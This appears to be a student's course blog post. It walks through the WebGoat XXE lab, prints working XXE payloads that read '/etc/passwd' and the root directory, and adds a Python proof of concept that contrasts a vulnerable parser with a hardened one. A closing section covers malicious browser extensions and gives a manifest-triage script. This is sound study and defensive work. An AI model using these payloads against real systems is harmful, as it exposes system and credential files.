I’m currently attending an intensive penetration testing course at Haaga-Helia during the summer semester. The course is taught by Tero Karvinen (http://terokarvinen.com/) and lasts 1.5 weeks. Every day there are 8 hours of lectures, plus these assignments. Every exercise can be found on our lecturer’s site, at this link: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits.
Today’s assignments were: 1. Solve a WebGoat exercise and report whether you used any of the OWASP Top 10 vulnerabilities (https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf). 2. Give an example of a MITRE ATT&CK technique (https://attack.mitre.org/) that could be used against the web.
WebGoat and OWASP Top 10
I started this assignment by starting my WebGoat server in Docker. Then I headed over to http://localhost:8080/WebGoat/ and started looking for an interesting exploitable section. My eye was caught by XXE, as I’ve seen it done but had never actually performed it myself.
This was the page that popped up:
I tested by entering some test data, but as could be expected, nothing happened. Then I started Burp Suite to get a better look at the request and see what is really happening.
It’s XML, as could have been guessed. I tried the correct parameter “BOS”, which was mentioned in the assignment.

We get some data out. Now, how can we exploit this to show the contents of the root directory? I searched for some XXE examples and found OWASP’s page (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) covering the topic. I took the example I thought would be most useful, which is this one:
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
I inserted that into the request with a few alterations first. I made my request look like this:

This, however, didn’t work. It’s most likely because it is expecting a file but is handed a directory; I’m not sure. More searching required.
I noticed that I had done it the wrong way; this blog post helped me figure it out (https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2). The entity is meant to be declared before the reference to it is made:

However, it still didn’t work. I feel like I’m missing a way to assign system commands like “ls” to this entity. Even more research required.
I found this post: https://enciphers.com/how-to-exploit-xxe-vulnerabilities/. It had an example that happened to be this very exercise. There, the XML entity part looked like this:
<?xml version="1.0"?> <!DOCTYPE xmlattack [ <!ENTITY sname SYSTEM "file:/"> ]> <searchForm> <from>&sname;</from> </searchForm>
There are a few differences. Apparently my problem was the element I created. In my case I didn’t need to create an element; the element was already there. So here’s the actual solution:

That was the only thing I was missing. I was creating a new element, but in this case the existing <from> element is the one we wanted to exploit, not a new one in which we would call the entity. The more you know.
So in this case, yes, I did use one of the OWASP Top 10: XXE is number 4 (A4:2017-XML External Entities), so it really is a high-priority one and good to know more about. Great learning experience.
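As an added example that is not part of the original write-up or of WebGoat: the same XXE payload shape (entity declared in the internal DTD subset, then referenced inside the existing <from> element) run against a parser with external entity resolution turned on and then off. Python’s xml.sax parser is used here instead of WebGoat’s Java parser, and a constructed temporary file stands in for /etc/passwd. A directory URL like the exercise’s "file:/" is not used, because Python’s file handler cannot read a directory the way Java’s did in WebGoat.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class FromFieldCollector(ContentHandler):
    """Collects the text inside <from>, the field the WebGoat form echoes back."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._chunks = []

    def startElement(self, name, attrs):
        if name == "from":
            self._inside = True

    def endElement(self, name):
        if name == "from":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self._chunks.append(content)

    def text(self):
        return "".join(self._chunks)


def build_payload(target_url):
    """Build the XXE request body. The entity is declared once in the internal
    DTD subset and referenced inside the element the application already
    parses (<from>); no new element is created. The exercise used "file:/";
    here target_url is a file:// URL to a regular file."""
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE searchForm [ <!ENTITY sname SYSTEM "{}"> ]>'
        '<searchForm><from>&sname;</from></searchForm>'
    ).format(target_url).encode()


def parse_from_field(body, resolve_external_entities):
    """Parse a request body with Python's SAX parser. True enables external
    general entity resolution (the vulnerable configuration); False is the
    hardened configuration, and the default since Python 3.7.1."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FromFieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return handler.text()


def demo():
    """Write a constructed secret file standing in for /etc/passwd, feed the
    same payload to the vulnerable and the hardened parser, and return
    (leaked, hardened, secret)."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"  # constructed sample line
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        path = fh.name
    try:
        body = build_payload(pathlib.Path(path).resolve().as_uri())
        leaked = parse_from_field(body, resolve_external_entities=True)
        hardened = parse_from_field(body, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, hardened, secret


if __name__ == "__main__":
    leaked, hardened, secret = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

The vulnerable parser returns the file contents as the text of <from>, which is exactly what the WebGoat response echoed back; the hardened parser returns an empty string because the external entity is never fetched. The fix in real code is the second configuration (or defusedxml), never input filtering on the request body.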
MITRE ATT&CK
In this assignment the point was to find an ATT&CK technique on MITRE’s website that could be used against the web. This task was far more difficult than I was expecting. There were so many techniques, and most seemed to be focused on something other than the web. I chose the Browser Extensions one (https://attack.mitre.org/techniques/T1176/).
Browser extensions are small programs installed in the browser to add functionality and benefits for the user. Once installed, they generally have access to everything the browser can access, limited only by the permissions the extension requests in its manifest, and those can cover every site the user visits.
Malicious browser extensions can be disguised as regular extensions. Users can download them from the browser’s app store, alongside all the legitimate extensions. Once the user has installed the extension, it can steal credentials, monitor network traffic, browse other websites in the background and even install a Remote Access Trojan (RAT) for persistent access.
The Stolen Pencil group (https://attack.mitre.org/groups/G0086/) has used this technique in the form of Google Chrome extensions. The malicious extension gave the attackers the ability to read data from any site the victim accessed.
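An added example, not from the original post or from MITRE: a small triage script for the check a defender would run against T1176, reading an extension’s manifest.json and flagging the combination that makes "read data from any site accessed" possible (a wildcard host pattern such as <all_urls> together with APIs like webRequest and cookies). The two manifests are constructed, the extension names are made up, and the Chrome profile layout used by scan_profile (Extensions/<id>/<version>/manifest.json) is an assumption about where the files live rather than something the post describes.

```python
import json
import os
import re

# Constructed manifests standing in for installed extensions (not real extensions).
BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Example notes",
    "version": "1.0",
    "permissions": ["storage"],
    "host_permissions": ["https://notes.example.com/*"],
})

SUSPICIOUS_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Font helper",
    "version": "2.3",
    "permissions": ["<all_urls>", "webRequest", "webRequestBlocking", "cookies", "tabs"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    "background": {"scripts": ["bg.js"], "persistent": True},
})

# API permissions that let an extension observe or alter traffic, cookies and sessions.
SENSITIVE_APIS = {"webRequest", "webRequestBlocking", "cookies", "tabs", "history",
                  "clipboardRead", "nativeMessaging", "debugger", "proxy", "scripting"}

# "<all_urls>" or a scheme followed by a wildcard host matches every site.
_BROAD_HOST = re.compile(r"^(\*|https?|file|ftp)://\*/")


def is_broad_host(pattern):
    return pattern == "<all_urls>" or bool(_BROAD_HOST.match(pattern))


def host_patterns(manifest):
    """Every URL match pattern the extension asks for. Manifest v2 mixes host
    patterns into 'permissions'; v3 lists them in 'host_permissions'. Content
    scripts declare the pages they inject into under 'matches'."""
    patterns = set()
    for p in manifest.get("permissions", []):
        if p == "<all_urls>" or "://" in p:
            patterns.add(p)
    patterns.update(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        patterns.update(script.get("matches", []))
    return patterns


def assess(manifest):
    """Return a list of findings for one manifest; an empty list means nothing stood out."""
    findings = []
    broad = sorted(p for p in host_patterns(manifest) if is_broad_host(p))
    if broad:
        findings.append("can read and modify every site: " + ", ".join(broad))
    apis = sorted(set(manifest.get("permissions", [])) & SENSITIVE_APIS)
    if apis:
        findings.append("sensitive APIs: " + ", ".join(apis))
    if broad and {"webRequest", "cookies"} & set(apis):
        findings.append("broad hosts plus traffic/cookie access: matches a credential-stealing extension")
    return findings


def triage_manifest_text(text):
    return assess(json.loads(text))


def scan_profile(extensions_dir):
    """Walk a Chrome profile's Extensions/<id>/<version>/manifest.json tree
    (assumed layout) and return findings keyed by extension directory."""
    report = {}
    for root, _dirs, files in os.walk(extensions_dir):
        if "manifest.json" in files:
            with open(os.path.join(root, "manifest.json"), encoding="utf-8") as fh:
                try:
                    report[root] = assess(json.load(fh))
                except ValueError:
                    report[root] = ["manifest.json is not valid JSON"]
    return report


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        print(label, triage_manifest_text(text))
```

The script only reads declared capabilities, so it cannot tell a malicious extension from a legitimate ad blocker that needs the same permissions; it narrows the list to the extensions worth reading the code of, and pairs well with alerting on new directories appearing under the profile’s Extensions folder.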